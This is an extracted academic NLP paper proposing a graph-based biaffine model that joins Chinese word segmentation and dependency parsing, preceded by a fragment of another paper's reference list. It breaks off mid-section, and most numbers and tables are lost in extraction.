http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ slenter dn, kutmon m, hanspers k, riutta a, windsor j, nunes n, mélius j, cirillo e, coort sl, digles d, ehrhart f, giesbertz p, kalafati m, martens m, miller r, nishida k, rieswijk l, waagmeester a, eijssen lmt, evelo ct, pico ar, willighagen el. . wikipathways: a multifaceted pathway database bridging metabolomics to other omics research. nucleic acids research (d ):d –d doi . /nar/gkx . the economist. . the world’s most valuable resource is no longer oil, but data. available at https://www.economist.com/leaders/ / / /the-worlds-most-valuable-resource-is-no-longer- oil-but-data. uhlen m, zhang c, lee s, sjöstedt e, fagerberg l, bidkhori g, benfeitas r, arif m, liu z, edfors f, sanli k, von feilitzen k, oksvold p, lundberg e, hober s, nilsson p, mattsson j, schwenk jm, brunnström h, glimelius b, sjöblom t, edqvist p-h, djureinovic d, micke p, lindskog c, mardinoglu a, ponten f. . a pathology atlas of the human cancer transcriptome. science ( ):eaan doi . /science.aan . waagmeester a, kutmon m, riutta a, miller r, willighagen el, evelo ct, pico ar. . using the semantic web for rapid integration of wikipathways with other biological online data resources. plos computational biology ( ): – doi . /journal.pcbi. . wang h, aggarwal cc. . a survey of algorithms for keyword search on graph data. in: managing and mining graph data. berlin: springer, – . wu w. . 
proactive natural language search engine: tapping into structured data on the web. in: proceeding of the joint edbt/icdt conferences. new york: acm press, – . wynholds la, wallis jc, borgman cl, sands a, traweek s. . data, data use, and scientific inquiry: two case studies of data practices. in: proceeding th acm/ieee-cs joint conference on digital libraries (jcdl ). new york: acm press, – . yu jx, qin l, chang l. . keyword search in relational databases: a survey. ieee data engineering bulletin ( ): – . zhang h, he x, harrison t, bian j. . aero: an evidence-based semantic web knowledge base of cancer behavioral risk factors. in: proceeding of the th international workshop on semantics-powered data mining and analytics co-located with the th international semantic web conference (iswc ), volume of ceur workshop proceedings. – .
a graph-based model for joint chinese word segmentation and dependency parsing hang yan, xipeng qiu∗, xuanjing huang school of computer science, fudan university, china shanghai key laboratory of intelligent information processing, fudan university, china {hyan , xpqiu, xjhuang}@fudan.edu.cn ∗corresponding author.

abstract chinese word segmentation and dependency parsing are two fundamental tasks for chinese natural language processing. the dependency parsing is defined at the word-level. therefore word segmentation is the precondition of dependency parsing, which makes dependency parsing suffer from error propagation and unable to directly make use of character-level pre-trained language models (such as bert). in this paper, we propose a graph-based model to integrate chinese word segmentation and dependency parsing. different from previous transition-based joint models, our proposed model is more concise, which results in fewer efforts of feature engineering. our graph-based joint model achieves better performance than previous joint models and state-of-the-art results in both chinese word segmentation and dependency parsing. additionally, when bert is combined, our model can substantially reduce the performance gap of dependency parsing between joint models and gold-segmented word-based models. our code is publicly available at https://github.com/fastnlp/jointcwsparser.

introduction unlike english, chinese sentences consist of continuous characters and lack obvious boundaries between chinese words. words are usually regarded as the minimum semantic unit, therefore chinese word segmentation (cws) becomes a preliminary pre-process step for downstream chinese natural language processing (nlp). for example, the fundamental nlp task, dependency parsing, is usually defined at the word-level. to parse a chinese sentence, the process is usually performed in the following pipeline method: word segmentation, part-of-speech (pos) tagging, and dependency parsing. however, the pipeline method always suffers from the following limitations: ( ) error propagation. in the pipeline method, once some words are wrongly segmented, the subsequent pos tagging and parsing will also make mistakes. as a result, pipeline models achieve dependency scores of around ∼ % (kurita et al., ). ( ) knowledge sharing. these three tasks (word segmentation, pos tagging, and dependency parsing) are strongly related.
the criterion of cws also depends on the word’s gram- matical role in a sentence. therefore, the knowledge learned from these three tasks can be shared. the knowledge of one task can help others. however, the pipeline method separately trains three models, each for a sin- gle task, and cannot fully exploit the shared knowledge among the three tasks. a traditional solution to this error propagation problem is to use joint models (hatori et al., ; zhang et al., ; kurita et al., ). these previous joint models mainly adopted a transition- based parsing framework to integrate the word seg- mentation, pos tagging, and dependency parsing. based on standard sequential shift-reduce transi- tions, they design some extra actions for word segmentation and pos tagging. although these joint models achieved better performance than the pipeline model, they still suffer from two limitations: ( ) the first is the huge search space. com- pared with word-level transition parsing, transactions of the association for computational linguistics, vol. , pp. – , . https://doi.org/ . /tacl a action editor: yue zhang. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april https://github.com/fastnlp/jointcwsparser https://github.com/fastnlp/jointcwsparser https://doi.org/ . /tacl_a_ character-level transition parsing has longer sequence of actions. the search space is huge. therefore, it is hard to find the best transition sequence exactly. usually, approx- imate strategies like greedy search or beam search are adopted in practice. however, approximate strategies do not, in general, produce an optimal solution. although exact searching is possible within o(n ) complex- ity (shi et al., ), due to their complexity, these models just focus on unlabeled depen- dency parsing, rather than labeled depen- dency parsing. ( ) the second is the feature engineering. these transition-based joint models rely on a de- tailed handcrafted feature. although kurita et al. ( ) introduced neural models to reduce partial efforts of feature engineering, they still require hard work on how to design and compose the word-based features from the stack and the character-based features from the buffer. recently, graph-based models have made signif- icant progress for dependency parsing (kiperwasser and goldberg, ; dozat and manning, ), which fully exploit the ability of the bidirec- tional long short-term memory network (bilstm) (hochreiter and schmidhuber, ) and attention mechanism (bahdanau et al., ) to capture the interactions of words in a sentence. different from the transition-based models, the graph-based mod- els assign a score or probability to each possible arc and then construct a maximum spanning tree from these weighted arcs. in this paper, we propose a joint model for cws and dependency parsing that integrates these two tasks into a unified graph-based parsing frame- work. because the segmentation is a character- level task and dependency parsing is a word-level task, we first formulate these two tasks into a character-level graph-based parsing framework. 
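to make this character-level reformulation concrete, the following minimal python sketch converts a gold word segmentation together with a word-level dependency tree into the character-level heads and labels described in detail in the proposed model section below. the function name, the input format (1-based word heads, 0 for the root), and the chinese example strings are illustrative assumptions, not the authors' released code.

```python
# Illustrative sketch: convert a gold word segmentation plus a word-level
# dependency tree into the character-level arcs used by the joint model.
# Words are strings; word heads are 1-based word indices (0 = root).
def to_character_level(words, word_heads, word_labels):
    # 1-based end position of every word in the character sequence
    ends, pos = [], 0
    for w in words:
        pos += len(w)
        ends.append(pos)

    char_heads, char_labels = [], []
    for w_idx, w in enumerate(words):
        start = ends[w_idx] - len(w) + 1
        # every character except the last depends on the next character ("app")
        for c in range(start, ends[w_idx]):
            char_heads.append(c + 1)
            char_labels.append("app")
        # the last character carries the original word-level relation,
        # re-attached to the last character of the head word (0 stays root)
        head_word = word_heads[w_idx]
        char_heads.append(0 if head_word == 0 else ends[head_word - 1])
        char_labels.append(word_labels[w_idx])
    return char_heads, char_labels

# Example (stand-in for the paper's "(develop) -> (financial sector)" arc):
# to_character_level(["发展", "金融业"], [0, 1], ["root", "dobj"])
# -> heads [2, 0, 4, 5, 2], labels ["app", "root", "app", "app", "dobj"]
```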
in detail, our model contains ( ) a deep neural network encoder, which can capture the long- term contextual features for each character— it can be a multi-layer bilstm or pre-trained bert, ( ) a biaffine attentional scorer (dozat and manning, ), which unifies segmentation and dependency relations at the character level. besides, unlike the previous joint models (hatori et al., ; zhang et al., ; kurita et al., ), our joint model does not depend on the pos tagging task. in experiments on three popular datasets, we obtain state-of-the-art performance on cws and dependency parsing. in this paper, we claim four contributions: • to the best of our knowledge, this is the first graph-based method to integrate cws and dependency parsing both in the training phase and the decoding phase. the proposed model is very concise and easily implemented. • compared with the previous transition-based joint models, our proposed model is a graph- based model, which results in fewer efforts of feature engineering. additionally, our model can deal with the labeled dependency parsing task, which is not easy for transition-based joint models. • in experiments on datasets ctb- , ctb- , and ctb- , our model achieves state-of- the-art score in joint cws and dependency parsing, even without the pos information. • as an added bonus, our proposed model can directly utilize the pre-trained language model bert (devlin et al., ) to boost perfor- mance significantly. the performance of many nlp tasks can be significantly enhanced when bert was combined (sun et al., ; zhong et al., ). however, for chinese, bert is based on chinese characters, whereas de- pendency parsing is conducted in the word- level. we cannot directly utilize bert to enhance the word-level chinese dependency parsing models. nevertheless, by using the our proposed model, we can exploit bert to implement cws and dependency parsing jointly. related work to reduce the problem of error propagation and improve the low-level tasks by incorporating the knowledge from the high-level tasks, many suc- cessful joint methods have been proposed to simultaneously solve related tasks, which can be categorized into three types. . joint segmentation and pos tagging because segmentation is a character-level task and pos tagging is a word-level task, an intuitive idea downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april is to transfer both the tasks into character-level and incorporate them in a uniform framework. a popular method is to assign a cross-tag to each character (ng and low, ). the cross- tag is composed of a word boundary part and a pos part, for example, ‘‘b-nn’’ refers to the first character in a word with pos tag ‘‘nn’’. thus, the joint cws and pos tagging can be regarded as a sequence labeling problem. following this work, zheng et al. ( ), chen et al. ( ), and shao et al. ( ) utilized neural models to alleviate the efforts of feature engineering. another line of the joint segmentation and pos tagging method is the transition-based method (zhang and clark, , ), in which the joint decoding process is regarded as a sequence of action predictions. zhang et al. ( ) used a simple yet effective sequence-to-sequence neu- ral model to improve the performance of the transition-based method. . joint pos tagging and dependency parsing because the pos tagging task and dependency parsing task are word-level tasks, it is more natural to combine them into a joint model. hatori et al. 
( ) proposed a transition-based joint pos tagging and dependency parsing model and showed that the joint approach improved the accuracies of these two tasks. yang et al. ( ) extended this model by neural models to alleviate the efforts of feature engineering. li et al. ( ) utilized the graph-based model to jointly optimize pos tagging and dependency parsing in a unique model. they also proposed an effective pos tag pruning method that could greatly improve the decoding efficiency. by combining the lexicality and syntax into a unified framework, joining pos tagging and dependency parsing can improve both tagging and parsing performance over independent modeling significantly. . joint segmentation, pos tagging, and dependency parsing compared with the above two kinds of joint tasks, it is non-trivial to incorporate all the three tasks into a joint model. hatori et al. ( ) first proposed a transition- based joint model for cws, pos tagging, and dependency parsing, which stated that dependency information improved the performances of word segmentation and pos tagging. zhang et al. ( ) expanded this work by using intra-character struc- tures of words and found the intra-character de- pendencies were helpful in word segmentation and pos tagging. zhang et al. ( ) proposed joint segmentation, pos tagging, and dependency re-ranking system. this system required a base parser to generate some candidate parsing results. kurita et al. ( ) followed the work of hatori et al. ( ); zhang et al. ( ) and used the bilstm to extract features with n-gram character string embeddings as input. a related work is the full character-level neural dependency parser (li et al., ), but it focuses on character-level parsing without considering the word segmentation and word-level pos tagging and parsing. although a heuristic method could transform the character-level parsing results to word-level, the transform strategy is tedious and the result is also worse than other joint models. besides, there are some joint models for constit- uency parsing. qian and liu ( ) proposed a joint inference model for word segmentation, pos tagging, and constituency parsing. however, their model did not train three tasks jointly and suffered from the decoding complexity due to the large combined search space. wang et al. ( ) first segmented a chinese sentence into a word lattice, and then predicted the pos tags and parsed tree based on the word lattice. a dual decomposition method was used to encourage the tagger and parser to predict agreed structures. the above methods show that syntactic parsing can provide useful feedback to word segmentation and pos tagging and the joint inference leads to improvements in all three sub-tasks. moreover, there is no related work on joint chinese word segmentation and dependency parsing, without pos tagging. proposed model previous joint methods are mainly based on the transition-based model, which modifies the stan- dard ‘‘shift-reduce’’ operations by adding some extra operations, such as ‘‘app’’ and ‘‘tag’’. dif- ferent from previous methods, we integrate word segmentation and dependency parsing into a graph-based parsing framework, which is simpler and easily implemented. first, we transform the word segmentation to a special arc prediction problem. for example, downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april figure : the unified framework for joint cws and dependency parsing. the green arc indicates the word-level dependency relation. 
the dashed blue arc with ‘‘app’’ indicates its connected characters belong to a word. a chinese word ‘‘ (financial sec- tor)’’ has two intra-word dependent arcs: ‘‘ ← ’’ and ‘‘ ← ’’. both intra-word de- pendent arcs have the label ‘‘app’’. in this work, all characters in a word (excluding the last character) depend on their latter character, as the ‘‘ (financial sector)’’ in figure . a character-based dependency parsing arc has also been used in hatori et al. ( ) and zhang et al. ( ), but their models were transition-based. second, we transform the word-level depen- dency arcs to character-level dependency arcs. assuming that there is a dependency arc between words w = xi:j and w = xu:v, where xi:j denotes the continuous characters from i to j in a sentence, we make this arc to connect the last characters xj and xv of each word. for example, the arc ‘‘ (develop)→ (financial sector)’’ is translated to ‘‘ → ’’. figure illustrates the framework for joint cws and dependency parsing. thus, we can use a graph-based parsing model to conduct these two tasks. our model contains two main components: ( ) a deep neural network encoder to extract the contextual features, which converts discrete characters into dense vectors, and ( ) a biaffine attentional scorer (dozat and manning, ), which takes the hidden vectors for the given character pair as input and predicts a label score vector. figure illustrates the model structure for joint cws and dependency parsing. the detailed description is as follows. . encoding layer the encoding layer is responsible for converting discrete characters into contextualized dense rep- figure : proposed joint model when the encoder layer is bilstm. for simplicity, we omit the predic- tion of the arc label, which uses a different biaffine classifier. resentations. in this paper, we tried two different kinds of encode layers. the first one is multi- layer bilstm, the second one is the pre-trained language model bert (devlin et al., ) which is based on self-attention. . . bilstm-based encoding layer given a character sequence x = {x , . . . , xn}, in neural models, the first step is to map discrete language symbols into distributed embedding space. formally, each character xi is mapped as ei ∈ rde ⊂ e, where de is a hyper-parameter indicating the size of character embedding, and e is the embedding matrix. character bigrams and trigrams have been shown highly effective for cws and pos tagging in previous studies (pei et al., ; chen et al., ; shao et al., ; zhang et al., ). following their settings, we combine the character bigram and trigram to enhance the representation of each character. the downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april final character representation of xi is given by ei = exi ⊕ exixi+ ⊕ exixi+ xi+ , where e denotes the embedding for unigram, bigram, and trigram, and ⊕ is the concatenation operator. to capture the long-term contextual informa- tion, we use a deep bilstm (hochreiter and schmidhuber, ) to incorporate information from both sides of a sequence, which is a preva- lent choice in recent research for nlp tasks. the hidden state of lstm for the i-th character is hi = bilstm(ei, −→ h i− , ←− hi+ , θ), ( ) where −→ h i and ←− hi are the hidden states at posi- tion i of the forward and backward lstms re- spectively, and θ denotes all the parameters in the bilstm layer. . . 
. . bert-based encoding layer other than using bilstm as the encoder layer, pre-trained bert can also be used as the encoding layer (devlin et al., ; cui et al., ). the input of bert is the character sequence $x = \{x_1, \ldots, x_n\}$; the output of the last layer of bert is used as the representation of the characters. more details on the structure of bert can be found in devlin et al. ( ).

. biaffine layer to predict the relations of each character pair, we use the biaffine attention mechanism (dozat and manning, ) to score their probability on top of the encoding layers. according to dozat and manning ( ), biaffine attention is more effective at measuring the relationship between two elementary units.

. . unlabeled arc prediction for the pair of the $i$-th and $j$-th characters, we first take the outputs of the encoding layer $h_i$ and $h_j$, then feed them into an extension of a bilinear transformation called a biaffine function to obtain the score for an arc from $x_i$ (head) to $x_j$ (dependent):

$r_i^{(\mathrm{arc\text{-}head})} = \mathrm{mlp}^{(\mathrm{arc\text{-}head})}(h_i)$, ( )
$r_j^{(\mathrm{arc\text{-}dep})} = \mathrm{mlp}^{(\mathrm{arc\text{-}dep})}(h_j)$, ( )
$s_{ij}^{(\mathrm{arc})} = r_i^{(\mathrm{arc\text{-}head})\top} U^{(\mathrm{arc})} r_j^{(\mathrm{arc\text{-}dep})} + r_i^{(\mathrm{arc\text{-}head})\top} u^{(\mathrm{arc})}$, ( )

where mlp is a multi-layer perceptron. a weight matrix $U^{(\mathrm{arc})}$ determines the strength of a link from $x_i$ to $x_j$, while $u^{(\mathrm{arc})}$ is used in the bias term, which controls the prior headedness of $x_i$. thus, $s_j^{(\mathrm{arc})} = [s_{1j}^{(\mathrm{arc})}; \cdots; s_{Tj}^{(\mathrm{arc})}]$ contains the scores of the potential heads of the $j$-th character; a softmax function is then applied to obtain the probability distribution. in the training phase, we minimize the cross-entropy of the golden head-dependent pairs. in the test phase, we ensure that the resulting parse is a well-formed tree by the heuristics formulated in dozat and manning ( ).

. . arc label prediction after obtaining the best predicted unlabeled tree, we assign the label scores $s_{ij}^{(\mathrm{label})} \in \mathbb{R}^{k}$ for every arc $x_i \rightarrow x_j$, in which the $k$-th element corresponds to the score of the $k$-th label and $k$ is the size of the label set. in our joint model, the arc label set consists of the standard word-level dependency labels and a special label "app" indicating the intra-dependency within a word. for the arc $x_i \rightarrow x_j$, we obtain $s_{ij}^{(\mathrm{label})}$ with

$r_i^{(\mathrm{label\text{-}head})} = \mathrm{mlp}^{(\mathrm{label\text{-}head})}(h_i)$, ( )
$r_j^{(\mathrm{label\text{-}dep})} = \mathrm{mlp}^{(\mathrm{label\text{-}dep})}(h_j)$, ( )
$r_{ij}^{(\mathrm{label})} = r_i^{(\mathrm{label\text{-}head})} \oplus r_j^{(\mathrm{label\text{-}dep})}$, ( )
$s_{ij}^{(\mathrm{label})} = r_i^{(\mathrm{label\text{-}head})\top} U^{(\mathrm{label})} r_j^{(\mathrm{label\text{-}dep})} + W^{(\mathrm{label})} r_{ij}^{(\mathrm{label})} + u^{(\mathrm{label})}$, ( )

where $U^{(\mathrm{label})} \in \mathbb{R}^{k \times p \times p}$ is a third-order tensor, $W^{(\mathrm{label})} \in \mathbb{R}^{k \times 2p}$ is a weight matrix, and $u^{(\mathrm{label})} \in \mathbb{R}^{k}$ is a bias vector. the best label of the arc $x_i \rightarrow x_j$ is determined according to $s_{ij}^{(\mathrm{label})}$:

$y_{ij} = \arg\max_{\mathrm{label}} s_{ij}^{(\mathrm{label})}$. ( )

in the training phase, we use golden head-dependent relations and cross-entropy to optimize arc label prediction. characters with continuous "app" arcs can be combined into a single word. if a character has no leftward "app" arc, it is a single-character word. the arc with label "app" is constrained to occur in two adjacent characters and is leftward.

figure : label prediction for word segmentation only. the arc with "app" indicates its connected characters belong to a word, and the arc with "seg" indicates its connected characters belong to different words.

when decoding, we first use the proposed model to predict the character-level labeled dependency tree, and then recover the word segmentation and word-level dependency
tree based on the predicted character-level arc labels. the characters with continuous ‘‘app’’ are regarded as one word. and the predicted head character of the last character is viewed as this word’s head. because the predicted arc points to a character, we regard the word that contains this head character as the head word. . models for word segmentation only the proposed model can be also used for the cws task solely. without considering the parsing task, we first assign a leftward unlabeled arc by default for every two adjacent characters, and then predict the arc labels that indicate the boundary of segmentation. in the task of word segmentation only, there are two kinds of arc labels: ‘‘seg’’ and ‘‘app’’. ‘‘seg’’ means there is a segmentation be- tween its connected characters, and ‘‘app’’ means its connected characters belong to one word. be- cause the unlabeled arcs are assigned in advance, we just use eq. ( ) ∼ ( ) to predict the labels: ‘‘seg’’ and ‘‘app’’. thus, the word segmentation task is transformed into a binary classification problem. figure gives an illustration of the labeled arcs for the task of word segmentation only. experiments . datasets we use the penn chinese treebank . (ctb- ), . (ctb- ), and . (ctb- ) datasets to evaluate our models (xue et al., ). for ctb- , the training set is from sections ∼ , ∼ , and ∼ , the development set is from section ∼ , and the test set is from section ∼ ; this splitting was also adopted by zhang and clark ( ), zhang et al. ( ), and kurita et al. ( ). for ctb- , we use the same split https://catalog.ldc.upenn.edu/ldc t . https://catalog.ldc.upenn.edu/ldc t . https://catalog.ldc.upenn.edu/ldc t . as wang et al. ( ), zhang et al. ( ), and kurita et al. ( ). for ctb- , we use the dev and test files proposed by shao et al. ( ), and we regard all left files as the training data. . measures following hatori et al. ( ), zhang et al. ( , ), and kurita et al. ( ), we use standard measures of word-level f , precision, and recall scores to evaluate word segmentation and dependency parsing (for both unlabeled and labeled scenario) tasks. we detail them in the following. • f seg: f measure of cws. this is the stan- dard metric used in the cws task (qiu et al., ; chen et al., ). • f udep: f measure of unlabeled dependency parsing. following hatori et al. ( ), zhang et al. ( , ), and kurita et al. ( ), we use standard measures of word-level f , precision, and recall score to evaluate dependency parsing. in the scenario of joint word segmentation and dependency parsing, the widely used unlabeled attachment score (uas) is not enough to measure the perfor- mance, since the error arises from two as- pects: one is caused by word segmentation and the other is due to the wrong prediction on the head word. a dependent-head pair is correct only when both the dependent and head words are accurately segmented and the dependent word correctly finds its head word. the precision of unlabeled dependency parsing (denoted as pudep) is calculated by the correct dependent-head pair versus the total number of dependent-head pairs (namely the number of segmented words). the recall of unlabeled dependency parsing (denoted as rudep) is computed by the correct dependent- head pair versus the total number of golden dependent-head pairs (namely, the number of golden words). the calculation of f udep is like f seg. • f ldep: f measure of labeled dependency parsing. 
the only difference from f udep is that except for the match between the head and dependent words, the pair must have the same label as the golden dependent-head pair. the precision and recall are calculated correspondingly. because the number of downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april https://catalog.ldc.upenn.edu/ldc t https://catalog.ldc.upenn.edu/ldc t https://catalog.ldc.upenn.edu/ldc t golden labeled dependent-head pairs and predicted labeled dependent-head pairs are the same with the counterparts of unlabeled dependency parsing, the value of f ldep can- not be higher than f udep. a more detailed description of dependency parsing metrics can be found in kübler et al. ( ). the uas, las equal to the value of the recall of unlabeled dependency parsing (rudep) and the recall of labeled dependency parsing (rldep), respectively. we also report these two values in our experiments. . experimental settings pre-trained embedding based on shao et al. ( ); zhang et al. ( ), n-grams are of great benefit to cws and pos tagging tasks. thus we use unigram, bigram, and trigram embeddings for all of our character-based models. we first pre-train unigram, bigram, and trigram embed- dings on the chinese wikipedia corpus by the method proposed in ling et al. ( ), which improves standard word vec by incorporating token order information. for a sentence with char- acters ‘‘abcd...’’, the unigram sequence is ‘‘a b c ...’’; the bigram sequence is ‘‘ab bc cd ...’’; and the trigram sequence is ‘‘abc bcd ...’’. for our word dependency parser, we use tencent’s pre-trained word embeddings (song et al., ). because tencent’s pre-trained word embedding dimension is , we set both pre-trained and random word embedding dimension as for all of our word dependency parsing models. all pre-trained em- beddings are fixed during our experiments. in addition to the fixed pre-trained embeddings, we also randomly initialize embeddings, and element- wisely add the pre-trained and random embed- dings before other procedures. for a model with bert encoding layer, we use the chinese bert- base released in cui et al. ( ). hyper-parameters the development set is used for parameter tuning. all random weights are ini- tialized by xavier normal initializer (glorot and bengio, ). for bilstm based models, we generally fol- low the hyper-parameters chosen in dozat and manning ( ). the model is trained with the adam algorithm (kingma and ba, ) to minimize the sum of the cross-entropy of arc pre- dictions and label predictions. after each training embedding dimension bilstm hidden size gradients clip batch size embedding dropout . lstm dropout . arc mlp dropout . label mlp dropout . lstm depth mlp depth arc mlp size label mlp size learning rate e- annealing . t/ β , β . max epochs table : hyper-parameter settings. epoch, we test the model on the dev set, and models with the highest f udep in development set are used to evaluate on the test sets; the results reported for different datasets in this paper are all on their test set. detailed hyper-parameters can be found in table . for bert based models, we use the adamw optimizer with a triangle learning rate warmup, the maximum learning rate is e− (loshchilov and hutter, ; devlin et al., ). it optimizes for five epochs, the model with the best development set performance is used to evaluate on the test sets. . proposed models in this section, we introduce the settings for our proposed joint models. 
based on the way the model uses dependency parsing labels and encod- ing layers, we divide our models into four kinds. we enumerate them as follows. • joint-segonly model: the proposed model can be also used for word segmentation task only. in this scenario, the dependency arcs are just allowed to appear in two adjacent characters and label ∈ {app, seg}. this model is described in section . . • joint-binary model: this scenario means label ∈ {app, dep}. in this situation, the label information of all the dependency arcs is ignored. each word-level dependency arc is labeled as dep, the intra-word depen- dency is regarded as app. characters with downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april models ctb- ctb- ctb- f seg f udep f seg f udep f seg f udep hatori et al. ( ) . . . . − − zhang et al. ( ) std . . . . − − zhang et al. ( ) eag . . . . − − zhang et al. ( ) . . − − − − kurita et al. ( ) . . . . − − joint-binary . . . . . . joint-multi . . . . . . joint-multi-bert . . . . . . std and eag in zhang et al. ( ) denote the arc-standard and the arc-eager models. f seg and f udep are the f score for chinese word segmentation and unlabeled dependency parsing, respectively. table : main results in the test set of different datasets. our joint-multi model achieves superior performance than previous joint models. the joint-multi-bert further enhances the performance of dependency parsing significantly. continuous app label will be joined together and viewed as one word. the dep label indicates this character is the end of a word. • joint-multi model: this scenario means label ∈ {app, dep , · · · , depk}, where k is the number of types of dependency arcs. the intra-word dependency is viewed as app. the other labels are the same as the original arc labels. but instead of representing the relationship between two words, the labeled arc represents the relationship between the last character of the dependent word and the last character of the head word. • joint-multi-bert model: for this kind of model, the encoding layer is bert. and it uses the same target scenario as the joint- multi model. . comparison with the previous joint models in this section, we mainly focus on the perfor- mance comparison between our proposed models and the previous joint models. because the pre- vious models just deal with the unlabeled depen- dency parsing, we just report the f seg and f udep here. as presented in table , our model (joint- binary) outpaces previous methods with a large margin in both cws and dependency parsing, even without the local parsing features that were extensively used in previous transition-based joint work (hatori et al., ; zhang et al., , ; kurita et al., ). another difference between our joint models and previous works is the combination of pos tags; the previous models all used the pos task as one componential task. despite the lack of pos tag information, our mod- els still achieve much better results. however, according to dozat and manning ( ), pos tags are beneficial to dependency parsers, there- fore one promising direction of our joint model might be incorporating pos tasks into this joint model. other than the performance distinction between previous work, our joint model with or without dependency labels also differ from each other. it is clearly shown in table that our joint model with labeled dependency parsing (joint-multi) outperforms its counterpart (joint-binary) in both cws and dependency parsing. 
with respect to the enhancement of dependency parsing caused by the arc labels, we believe it can be credited to two aspects. the first one is the more accurate cws. the second one is that label information between two characters will give extra supervision for the search of head characters. the reason why labeled dependency parsing is conducive to cws will be also analyzed in section . . owing to the joint decoding of cws and de- pendency parsing, we can utilize the character- level pre-trained language model bert. the last row of table displays that the f udep can be substantially increased when bert is used, even when the performance of cws not improve too much. we presume this indicates that bert can better extract the contextualized information to help the dependency parsing. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april models tag set ctb- ctb- ctb- f seg pseg rseg f seg pseg rseg f seg pseg rseg lstm+mlp {b, m, e, s} . . . . . . . . . lstm+crf {b, m, e, s} . . . . . . . . . lstm+mlp {app, seg} . . . . . . . . . joint-segonly {app, seg} . . . . . . . . . joint-binary {app, dep} . . . . . . . . . joint-multi {app, dep , · · · , depk} . . . . . . . . . joint-multi-bert {app, dep , · · · , depk} . . . . . . . . . the upper part refers the models based on sequence labeling. the lower part refers our proposed joint models which are detailed in section . . the proposed joint models achieve near or better f seg than models trained only on chinese word segmentation. f seg, pseg, and rseg are the f , precision, and recall of cws, respectively. table : results of chinese word segmentation. . chinese word segmentation in this part, we focus on the performance of our model for the cws task only. most of state-of-the-art cws methods are based on sequence labeling, in which every sentence is transformed into a sequence of{b, m, e, s} tags. b represents the begin of a word, m represents the middle of a word, e represents the end of a word, and s represents a word with only one character. we compare our model with these state-of-the-art methods. • lstm+mlp with {b, m, e, s} tags. fol- lowing ma et al. ( ), we tried to do cws without conditional random fields (crfs). after bilstm, the hidden states of each character further forwards into a multi-layer perceptron (mlp), so that every character can output a probability distribution over the label set. the viterbi algorithm is utilized to find the global maximum label sequence when testing. • lstm+crf with {b, m, e, s} tags. the only difference between this scenario and the previous one is whether using crf after the mlp (lafferty et al., ; chen et al., ). • lstm+mlp with {app, seg} tags. the seg- mentation of a chinese sentence can be represented by a sequence of {app, seg}, where app represents that the next character and this character belongs to the same word, and seg represents that this character is the last character of a word. therefore, cws can be viewed as a binary classification prob- lem. except for the tag set, this model’s architecture is similar to the lstm+mlp scenario. all of these models use the multi-layer bilstm as the encoder; they differ from each other in their way of decoding and the tag set. the number of bilstm layers is and the hidden size is . the performance of all models are listed in table . the first two rows present the difference between whether utilizing crf on the top of mlp. crf performance is slightly better than its counterpart. 
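the two tag sets compared in this part differ only in how a segmentation is serialized; a minimal sketch of both encodings follows (the example segmentation is made up and not taken from the datasets).

def to_bmes(words):
    """{B, M, E, S}: begin/middle/end of a multi-character word, S = singleton."""
    tags = []
    for w in words:
        if len(w) == 1:
            tags.append("S")
        else:
            tags.extend(["B"] + ["M"] * (len(w) - 2) + ["E"])
    return tags

def to_app_seg(words):
    """{app, seg}: 'app' joins a character to the next one, 'seg' ends a word."""
    tags = []
    for w in words:
        tags.extend(["app"] * (len(w) - 1) + ["seg"])
    return tags

if __name__ == "__main__":
    words = ["他", "喜欢", "音乐"]
    print(to_bmes(words))     # ['S', 'B', 'E', 'B', 'E']
    print(to_app_seg(words))  # ['seg', 'app', 'seg', 'app', 'seg']

the {app, seg} encoding is exactly the binary decision the joint-segonly model makes for each pair of adjacent characters, which is why the two setups are directly comparable.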
the first row and the third row display the comparison between different tag scenarios, the {b, m, e, s} tag set is slightly better than the {app, seg} tag set. different from the competitor sequence labeling model (lstm+mlp with {app, seg} tag set), our joint-segonly model uses the biaffine to model the interaction between the two adjacent characters near the boundary and achieves slightly better or similar performances on all datasets. the empirical results in the three datasets suggest that modeling the interaction between two consecutive characters are helpful to cws. if two characters are of high probability to be in a certain depen- dency parsing relationship, there will be a greater chance that one of the characters is the head character. the lower part of table shows the segmen- tation evaluation of the proposed joint models. jointly training cws and dependency parsing achieves comparable or slightly better cws than training cws alone. although head prediction is not directly related to cws, the head character can downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april models ctb- ctb- ctb- f seg f udep uas f ldep las f seg f udep uas f ldep las f seg f udep uas f ldep las biaffine† − − . − . − − . − . − − . − . pipeline§ . . . . . . . . . . . . . . . joint-multi . . . . . . . . . . . . . . . joint-multi-bert . . . . . . . . . . . . . . . † the results are evaluated by a word-level biaffine parser on the gold-segmented sentences. § the pipeline model first uses the joint-segonly model to segment the sentence, then uses the word-level biaffine parser to obtain the parsing result. table : comparison with the pipeline model. our joint-multi models outperform the pipeline models in a large margin. when bert is used, the dependency parsing performance was significantly improved, although the chinese word segmentation does not meliorate a lot. models ctb- ctb- ctb- f seg f udep uas f ldep las f seg f udep uas f ldep las f seg f udep uas f ldep las joint-multi . . . . . . . . . . . . . . . -pre-trained . . . . . . . . . . . . . . . -n-gram . . . . . . . . . . . . . . . the ‘-pre-trained’ means the model is trained without the pre-trained embeddings. the ‘-n-gram’ means the model is trained by removing the bigram and trigram embeddings, only randomly initialized and pre-trained character embeddings are used. table : ablation experiments for joint-multi models. only be the end of a word, therefore combination between cws and character dependency pars- ing actually introduces more supervision for the former task. on ctb- , the joint-binary and joint- multi models are slightly worse than the joint- segonly model. the reason may be that the ctb- dataset is relatively small and the complicated models suffer from the overfitting. from the last row of table , bert can further enhance the model’s performance on cws. another noticeable phenomenon from the lower part of table is that the labeled dependency pars- ing brings benefit to cws. we assume this is be- cause the extra supervision from dependency parsing labels is informative for word segmentation. . comparison with the pipeline model in this part, we compare our 